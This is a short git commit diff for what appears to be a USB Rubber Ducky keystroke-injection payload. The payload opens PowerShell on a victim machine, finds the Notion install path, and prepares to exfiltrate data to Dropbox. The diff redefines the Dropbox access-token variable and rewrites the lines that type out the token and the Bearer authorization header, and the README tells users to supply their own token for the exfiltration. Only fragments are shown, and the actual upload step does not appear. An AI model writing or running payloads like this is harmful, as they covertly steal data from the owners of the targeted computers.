Var redefined

pull/338/head
aleff-github 2023-10-19 08:29:15 +02:00
parent a71079c58c
commit 3b115eccbe
2 changed files with 3 additions and 6 deletions

View File

@ -19,7 +19,7 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
`DEFINE DROPBOX_ACCESS_TOKEN "example"`
`DEFINE #DROPBOX_ACCESS_TOKEN "example"`
## Credits

View File

@ -15,7 +15,7 @@ REM - Internet Connection
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE DROPBOX_ACCESS_TOKEN example
DEFINE #DROPBOX_ACCESS_TOKEN example
GUI r
DELAY 1000
@ -30,10 +30,7 @@ STRINGLN
END_STRINGLN
REM Setting about exfiltration
STRING $accessToken = "
STRING DROPBOX_ACCESS_TOKEN
STRING "
ENTER
STRINGLN $accessToken = "#DROPBOX_ACCESS_TOKEN"
STRINGLN
$authHeader = @{Authorization = "Bearer $accessToken"}